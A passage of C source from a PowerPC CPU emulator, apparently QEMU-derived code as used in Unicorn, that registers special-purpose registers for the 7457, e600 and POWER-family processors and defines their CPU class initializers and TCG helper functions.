"UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* SPRGs */ spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG4, "USPRG4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG5, "USPRG5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG6, "USPRG6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG7, "USPRG7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7457)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7457 (aka G4)"; pcc->init_proc = init_proc_7457; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << 
MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_74xx; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } #endif static void init_proc_e600(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* XXX : not implemented */ spr_register(env, SPR_UBAMR, "UBAMR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* SPRGs */ spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG4, "USPRG4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG5, "USPRG5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG6, "USPRG6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG7, "USPRG7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(e600)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC e600"; pcc->init_proc = init_proc_e600; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | 
PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC;
    pcc->insns_flags2 = PPC_NONE;
    pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) |
                    (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) |
                    (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) |
                    (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) |
                    (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) |
                    (1ull << MSR_RI) | (1ull << MSR_LE);
    pcc->mmu_model = POWERPC_MMU_32B;
    pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault;
    pcc->excp_model = POWERPC_EXCP_74xx;
    pcc->bus_model = PPC_FLAGS_INPUT_6xx;
    pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE |
                 POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK;
}

#if defined(TARGET_PPC64)
#define POWERPC970_HID5_INIT 0x00000000

static void gen_fscr_facility_check(DisasContext *ctx, int facility_sprn,
                                    int bit, int sprn, int cause)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t1 = tcg_const_i32(tcg_ctx, bit);
    TCGv_i32 t2 = tcg_const_i32(tcg_ctx, sprn);
    TCGv_i32 t3 = tcg_const_i32(tcg_ctx, cause);

    gen_helper_fscr_facility_check(tcg_ctx, tcg_ctx->cpu_env, t1, t2, t3);

    tcg_temp_free_i32(tcg_ctx, t3);
    tcg_temp_free_i32(tcg_ctx, t2);
    tcg_temp_free_i32(tcg_ctx, t1);
}

static void gen_msr_facility_check(DisasContext *ctx, int facility_sprn,
                                   int bit, int sprn, int cause)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t1 = tcg_const_i32(tcg_ctx, bit);
    TCGv_i32 t2 = tcg_const_i32(tcg_ctx, sprn);
    TCGv_i32 t3 = tcg_const_i32(tcg_ctx, cause);

    gen_helper_msr_facility_check(tcg_ctx, tcg_ctx->cpu_env, t1, t2, t3);

    tcg_temp_free_i32(tcg_ctx, t3);
    tcg_temp_free_i32(tcg_ctx, t2);
    tcg_temp_free_i32(tcg_ctx, t1);
}

static void spr_read_prev_upper32(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv spr_up = tcg_temp_new(tcg_ctx);
    TCGv spr = tcg_temp_new(tcg_ctx);

    gen_load_spr(tcg_ctx, spr, sprn - 1);
    tcg_gen_shri_tl(tcg_ctx, spr_up, spr, 32);
    tcg_gen_ext32u_tl(tcg_ctx, cpu_gpr[gprn], spr_up);

    tcg_temp_free(tcg_ctx, spr);
    tcg_temp_free(tcg_ctx, spr_up);
}

static void spr_write_prev_upper32(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv spr = tcg_temp_new(tcg_ctx);

    gen_load_spr(tcg_ctx, spr, sprn - 1);
    tcg_gen_deposit_tl(tcg_ctx, spr, spr, cpu_gpr[gprn], 32, 32);
    gen_store_spr(tcg_ctx, sprn - 1, spr);

    tcg_temp_free(tcg_ctx, spr);
}

static int check_pow_970(CPUPPCState *env)
{
    if (env->spr[SPR_HID0] & (HID0_DEEPNAP | HID0_DOZE | HID0_NAP)) {
        return 1;
    }

    return 0;
}

static void gen_spr_970_hid(CPUPPCState *env)
{
    /* Hardware implementation registers */
    /* XXX : not implemented */
    spr_register(env, SPR_HID0, "HID0",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_clear,
                 0x60000000);
    spr_register(env, SPR_HID1, "HID1",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_970_HID5, "HID5",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 POWERPC970_HID5_INIT);
}

static void gen_spr_970_hior(CPUPPCState *env)
{
    spr_register(env, SPR_HIOR, "SPR_HIOR",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_hior, &spr_write_hior,
                 0x00000000);
}

static void gen_spr_book3s_ctrl(CPUPPCState *env)
{
    spr_register(env, SPR_CTRL, "SPR_CTRL",
                 SPR_NOACCESS, SPR_NOACCESS,
                 SPR_NOACCESS, &spr_write_generic,
                 0x00000000);
    spr_register(env, SPR_UCTRL, "SPR_UCTRL",
                 &spr_read_ureg, SPR_NOACCESS,
                 &spr_read_ureg, SPR_NOACCESS,
                 0x00000000);
}

static void gen_spr_book3s_altivec(CPUPPCState *env)
{
    if (!(env->insns_flags & PPC_ALTIVEC)) {
        return;
    }
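/*
 * Editor's note: spr_read_prev_upper32/spr_write_prev_upper32 above
 * expose the high word of the preceding 64-bit SPR (sprn - 1) as its
 * own 32-bit register (used later for TEXASRU, BESCRSU and friends).
 * The TCG shift/deposit pair is equivalent to this plain C (sketch,
 * not part of the build):
 *
 *   #include <stdint.h>
 *
 *   static uint32_t upper32_read(uint64_t spr)
 *   {
 *       return (uint32_t)(spr >> 32);            // high half only
 *   }
 *
 *   static uint64_t upper32_write(uint64_t spr, uint32_t val)
 *   {
 *       // replace bits 32..63, keep the low word intact
 *       return (spr & 0x00000000ffffffffull) | ((uint64_t)val << 32);
 *   }
 */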
spr_register_kvm(env, SPR_VRSAVE, "VRSAVE", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_VRSAVE, 0x00000000); /* * Can't find information on what this should be on reset. This * value is the one used by 74xx processors. */ vscr_init(env, 0x00010000); } static void gen_spr_book3s_dbg(CPUPPCState *env) { /* * TODO: different specs define different scopes for these, * will have to address this: * 970: super/write and super/read * powerisa 2.03..2.04: hypv/write and super/read. * powerisa 2.05 and newer: hypv/write and hypv/read. */ spr_register_kvm(env, SPR_DABR, "DABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DABR, 0x00000000); spr_register_kvm(env, SPR_DABRX, "DABRX", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DABRX, 0x00000000); } static void gen_spr_book3s_207_dbg(CPUPPCState *env) { spr_register_kvm_hv(env, SPR_DAWR, "DAWR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DAWR, 0x00000000); spr_register_kvm_hv(env, SPR_DAWRX, "DAWRX", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DAWRX, 0x00000000); spr_register_kvm_hv(env, SPR_CIABR, "CIABR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_CIABR, 0x00000000); } static void gen_spr_970_dbg(CPUPPCState *env) { /* Breakpoints */ spr_register(env, SPR_IABR, "IABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_book3s_pmu_sup(CPUPPCState *env) { spr_register_kvm(env, SPR_POWER_MMCR0, "MMCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_MMCR0, 0x00000000); spr_register_kvm(env, SPR_POWER_MMCR1, "MMCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_MMCR1, 0x00000000); spr_register_kvm(env, SPR_POWER_MMCRA, "MMCRA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_MMCRA, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC1, "PMC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC1, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC2, "PMC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC2, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC3, "PMC3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC3, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC4, "PMC4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC4, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC5, 0x00000000); spr_register_kvm(env, SPR_POWER_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC6, 0x00000000); spr_register_kvm(env, SPR_POWER_SIAR, "SIAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_SIAR, 0x00000000); spr_register_kvm(env, SPR_POWER_SDAR, "SDAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_SDAR, 0x00000000); } static void gen_spr_book3s_pmu_user(CPUPPCState *env) { spr_register(env, SPR_POWER_UMMCR0, "UMMCR0", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UMMCR1, "UMMCR1", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 
0x00000000); spr_register(env, SPR_POWER_UMMCRA, "UMMCRA", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC1, "UPMC1", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC2, "UPMC2", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC3, "UPMC3", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC4, "UPMC4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_USIAR, "USIAR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_USDAR, "USDAR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); } static void gen_spr_970_pmu_sup(CPUPPCState *env) { spr_register_kvm(env, SPR_970_PMC7, "PMC7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC7, 0x00000000); spr_register_kvm(env, SPR_970_PMC8, "PMC8", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PMC8, 0x00000000); } static void gen_spr_970_pmu_user(CPUPPCState *env) { spr_register(env, SPR_970_UPMC7, "UPMC7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_970_UPMC8, "UPMC8", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); } static void gen_spr_power8_pmu_sup(CPUPPCState *env) { spr_register_kvm(env, SPR_POWER_MMCR2, "MMCR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_MMCR2, 0x00000000); spr_register_kvm(env, SPR_POWER_MMCRS, "MMCRS", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_MMCRS, 0x00000000); spr_register_kvm(env, SPR_POWER_SIER, "SIER", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_SIER, 0x00000000); spr_register_kvm(env, SPR_POWER_SPMC1, "SPMC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_SPMC1, 0x00000000); spr_register_kvm(env, SPR_POWER_SPMC2, "SPMC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_SPMC2, 0x00000000); spr_register_kvm(env, SPR_TACR, "TACR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_TACR, 0x00000000); spr_register_kvm(env, SPR_TCSCR, "TCSCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_TCSCR, 0x00000000); spr_register_kvm(env, SPR_CSIGR, "CSIGR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_CSIGR, 0x00000000); } static void gen_spr_power8_pmu_user(CPUPPCState *env) { spr_register(env, SPR_POWER_UMMCR2, "UMMCR2", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, &spr_write_ureg, 0x00000000); spr_register(env, SPR_POWER_USIER, "USIER", &spr_read_generic, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_power5p_ear(CPUPPCState *env) { /* External access control */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_power5p_tb(CPUPPCState *env) { /* TBU40 (High 40 bits of the Timebase register */ 
spr_register_hv(env, SPR_TBU40, "TBU40",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, &spr_write_tbu40,
                    0x00000000);
}

static void spr_write_hmer(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv hmer = tcg_temp_new(tcg_ctx);

    gen_load_spr(tcg_ctx, hmer, sprn);
    tcg_gen_and_tl(tcg_ctx, hmer, cpu_gpr[gprn], hmer);
    gen_store_spr(tcg_ctx, sprn, hmer);
    spr_store_dump_spr(sprn);
    tcg_temp_free(tcg_ctx, hmer);
}

static void spr_write_lpcr(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_store_lpcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
}

static void gen_spr_970_lpar(CPUPPCState *env)
{
    /*
     * PPC970: HID4 covers things later controlled by the LPCR and
     * RMOR in later CPUs, but with a different encoding. We only
     * support the 970 in "Apple mode" which has all hypervisor
     * facilities disabled by strapping, so we can basically just
     * ignore it.
     */
    spr_register(env, SPR_970_HID4, "HID4",
                 SPR_NOACCESS, SPR_NOACCESS,
                 &spr_read_generic, &spr_write_generic,
                 0x00000000);
}

static void gen_spr_power5p_lpar(CPUPPCState *env)
{
    /* Logical partitioning */
    spr_register_kvm_hv(env, SPR_LPCR, "LPCR",
                        SPR_NOACCESS, SPR_NOACCESS,
                        SPR_NOACCESS, SPR_NOACCESS,
                        &spr_read_generic, &spr_write_lpcr,
                        KVM_REG_PPC_LPCR, LPCR_LPES0 | LPCR_LPES1);
    spr_register_hv(env, SPR_HDEC, "HDEC",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_hdecr, &spr_write_hdecr, 0);
}

static void gen_spr_book3s_ids(CPUPPCState *env)
{
    /* FIXME: Will need to deal with thread vs core only SPRs */
    /* Processor identification */
    spr_register_hv(env, SPR_PIR, "PIR",
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, SPR_NOACCESS,
                    &spr_read_generic, NULL,
                    0x00000000);
    spr_register_hv(env, SPR_HID0, "HID0",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0x00000000);
    spr_register_hv(env, SPR_TSCR, "TSCR",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0x00000000);
    spr_register_hv(env, SPR_HMER, "HMER",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_hmer,
                    0x00000000);
    spr_register_hv(env, SPR_HMEER, "HMEER",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0x00000000);
    spr_register_hv(env, SPR_TFMR, "TFMR",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0x00000000);
    spr_register_hv(env, SPR_LPIDR, "LPIDR",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_lpidr,
                    0x00000000);
    spr_register_hv(env, SPR_HFSCR, "HFSCR",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0x00000000);
    spr_register_hv(env, SPR_MMCRC, "MMCRC",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0x00000000);
    spr_register_hv(env, SPR_MMCRH, "MMCRH",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0x00000000);
    spr_register_hv(env, SPR_HSPRG0, "HSPRG0",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0x00000000);
    spr_register_hv(env, SPR_HSPRG1, "HSPRG1",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0x00000000);
    spr_register_hv(env, SPR_HSRR0, "HSRR0",
                    SPR_NOACCESS, SPR_NOACCESS,
                    SPR_NOACCESS, SPR_NOACCESS,
                    &spr_read_generic, &spr_write_generic,
                    0x00000000);
    spr_register_hv(env,
SPR_HSRR1, "HSRR1", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HDAR, "HDAR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HDSISR, "HDSISR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register_hv(env, SPR_HRMOR, "HRMOR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_rmor(CPUPPCState *env) { spr_register_hv(env, SPR_RMOR, "RMOR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_spr_power8_ids(CPUPPCState *env) { /* Thread identification */ spr_register(env, SPR_TIR, "TIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); } static void gen_spr_book3s_purr(CPUPPCState *env) { /* PURR & SPURR: Hack - treat these as aliases for the TB for now */ spr_register_kvm_hv(env, SPR_PURR, "PURR", &spr_read_purr, SPR_NOACCESS, &spr_read_purr, SPR_NOACCESS, &spr_read_purr, &spr_write_purr, KVM_REG_PPC_PURR, 0x00000000); spr_register_kvm_hv(env, SPR_SPURR, "SPURR", &spr_read_purr, SPR_NOACCESS, &spr_read_purr, SPR_NOACCESS, &spr_read_purr, &spr_write_purr, KVM_REG_PPC_SPURR, 0x00000000); } static void gen_spr_power6_dbg(CPUPPCState *env) { spr_register(env, SPR_CFAR, "SPR_CFAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_cfar, &spr_write_cfar, 0x00000000); } static void gen_spr_power5p_common(CPUPPCState *env) { spr_register_kvm(env, SPR_PPR, "PPR", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_PPR, 0x00000000); } static void gen_spr_power6_common(CPUPPCState *env) { spr_register_kvm(env, SPR_DSCR, "SPR_DSCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DSCR, 0x00000000); /* * Register PCR to report POWERPC_EXCP_PRIV_REG instead of * POWERPC_EXCP_INVAL_SPR in userspace. Permit hypervisor access. 
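 *
 * Editor's note (an assumption, inferred from the pcr_mask and
 * pcr_supported fields set in the POWERPC_FAMILY() initializers
 * below): the PCR selects an architected compatibility level, and a
 * write is filtered against the bits this CPU actually implements,
 * roughly
 *
 *     env->spr[SPR_PCR] = value & pcc->pcr_mask;
 *
 * so e.g. a POWER8 can be put into ISA 2.05/2.06 compat mode, while
 * bits outside its pcr_mask are silently dropped.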
*/ spr_register_hv(env, SPR_PCR, "PCR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pcr, 0x00000000); } static void spr_read_tar(DisasContext *ctx, int gprn, int sprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_TAR, sprn, FSCR_IC_TAR); spr_read_generic(ctx, gprn, sprn); } static void spr_write_tar(DisasContext *ctx, int sprn, int gprn) { gen_fscr_facility_check(ctx, SPR_FSCR, FSCR_TAR, sprn, FSCR_IC_TAR); spr_write_generic(ctx, sprn, gprn); } static void gen_spr_power8_tce_address_control(CPUPPCState *env) { spr_register_kvm(env, SPR_TAR, "TAR", &spr_read_tar, &spr_write_tar, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_TAR, 0x00000000); } static void spr_read_tm(DisasContext *ctx, int gprn, int sprn) { gen_msr_facility_check(ctx, SPR_FSCR, MSR_TM, sprn, FSCR_IC_TM); spr_read_generic(ctx, gprn, sprn); } static void spr_write_tm(DisasContext 